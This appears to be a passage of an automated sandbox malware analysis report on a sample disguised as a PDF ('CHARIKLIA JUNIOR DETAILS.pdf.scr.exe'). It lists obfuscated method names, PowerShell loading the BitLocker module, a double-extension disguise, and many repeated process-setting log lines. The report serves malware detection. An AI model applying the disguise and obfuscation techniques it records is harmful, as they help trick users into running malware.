                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, WoIeMMKENcLTkZ5yTy.csHigh entropy of concatenated method names: 'WgQtwDicQN', 'FyxtTslUFu', 'ODetKFcQyo', 'GArtFfTgu8', 'U6btaFuM2B', 'jTjt62r4Tm', 'Jkltj0FmtU', 'cyStQXoodN', 'xGctCGA7up', 'nKItrL6l9d'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, BMJIbmFGTNF56vX1ga.csHigh entropy of concatenated method names: 'kWBtMeeH7u', 'IkMt9iJ2ce', 'wNttLmQVEk', 'Pw3tRAaUaY', 'q6DOeq7JkBf127nBxEy', 'rqaNt57yItV3KxgIw26', 'SVg0bd7rsmvCNKlnxjT', 'GOl6Gt7GTWlmwByXaWF'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, EhbdPpziB5ht4NFO3c.csHigh entropy of concatenated method names: 'VUCPYKSsMc', 'U0VPff3TWo', 'hFbPS2PSD8', 'rTlPpyw3sV', 'TfCPaDx5ph', 'oNaPjvCghS', 'LdxPQc8tQb', 'C0xPncRHEn', 'nxUPcEbWOK', 'JSOPh4tf1i'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, QPotiGAHGh845Es1EeE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PQHPWZSy28', 'CycPT6rhZW', 'S9sPb7EPNF', 'g06PKFFGFi', 'owcPFNElDd', 'kDHPgvqXhk', 'O32PmCIMN2'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.csHigh entropy of concatenated method names: 'Mh1qieyNEp', 'i1TqECsHJV', 'VdKqITD8fI', 'tyeqNFIfJn', 'oMRqynEIX5', 'lv4qJUKcH4', 'JFmqsfj4Ck', 'S4IqXUHySb', 'PYsqVLYR9p', 'q2VqGjcJbM'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, uYcnS7N2rgKIWsFxaW.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YS3UL4javS', 'AWtUR9Rnch', 'ambUzXqlZk', 'igrqHDFXf9', 'hPvqASX3Y7', 'GJrqUXUGQ8', 'DdWqqhWtVw', 'NxtQpSPtFmv42ihs59O'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, EZiWFwIbaBbaLGoZN3.csHigh entropy of concatenated method names: 'Dispose', 'OfFALMCaoj', 'M5NUaB7l8s', 'Ko0HXZOBnl', 'b6AARQRVV2', 'usdAzvNUum', 'ProcessDialogKey', 'qF6UHqPboY', 'AprUA4r8ku', 'lLpUUjkAS7'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, xtJn9c5XQ9QJTf70qb.csHigh entropy of concatenated method names: 'iFvAsO0cHC', 'p6EAXeD0PN', 'PIaAGeaio0', 'e1kAvOx0MU', 'UPHAtioYlt', 'mPrAONjb1V', 'FrPyBRj8OL0p56JLv7', 'gdFDhcRZ2tZEVZcOUc', 'Fp6AACupZQ', 'sZKAqajAaP'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Uses an obfuscated file name to hide its real file extension (double extension)
                  Source: Possible double extension: pdf.scrStatic PE information: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
